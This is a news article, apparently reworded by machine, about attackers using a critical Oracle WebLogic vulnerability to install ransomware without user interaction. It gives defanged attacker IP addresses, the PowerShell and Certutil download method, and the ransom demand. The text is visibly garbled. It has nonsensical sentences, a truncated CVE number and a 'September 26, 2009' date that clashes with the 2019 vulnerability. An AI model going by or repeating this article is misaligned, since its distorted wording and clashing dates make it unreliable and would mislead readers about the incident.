Attackers have actively exploited a critical zero-day vulnerability on the widely-used Oracle WebLogic server to install ransomware without end-users or researchers who are Cisco researchers having to do so, Talos said Tuesday.
The susceptibility and working exploit code was first publicized in the National Vulnerability Database of China two weeks ago, researchers from security education group SANS ISC report. The vulnerability is easy to exploit, allowing attackers to run code of their choice on cloud servers. Because of their performance, bandwidth, and use in high-security cloud environments, these servers are considered high-value targets. The disclosure prompted Oracle to release an emergency patch on Friday. [Tuesday, September 26, 2009] Researchers with Cisco Talos said CVE-201
No interaction required
"Previously, most variants of ransomware required some sort of user interaction. For example, a user who opens an attachment to an email message, clicks a malicious link, or runs malware on the device, "wrote Talos researcher Pierre Cadieux, Colin Grady, Jaeson Schultz, and Matt Valites on Tuesday. "In this case, the attackers simply used the Oracle WebLogic vulnerability, which allowed the affected server to download a copy of the ransomware from the attacker-controlled IP addresses 188.166.74 [.] 218 and 45.55.211 [.] 79."  The vulnerability is exploitable because it only requires HTTP access to a vulnerable WebLogic server. The severity of the Common Vulnerability Scoring System is 9.8 out of 10 possible. Attackers send a POST command to a vulnerable server containing a PowerShell command that downloads and then executes a malicious file called radm.exe. Attackers in addition to PowerShell Use CVE-2019-2725 to use the Certutil command-line tool. Other files that are downloaded and run include office.exe and untitled.exe.
The ransom note pictured above and below pays $ 2,500 worth of Bitcoin within two days to receive the decryption key unlocking encryption data. After this period, the ransom will double to $ 5,000. The attackers give instructions on how cryptocurrent newbies can set up a Bitcoin wallet and receive the digital currency until they recommend the use of Blockchain.info.
The attacks are characterized by a high degree of zero-day severity in software that is widely used in cloud environments. The combination means that attacks are likely to continue. Organizations that use WebLogic should make installing the patch for Friday a top priority.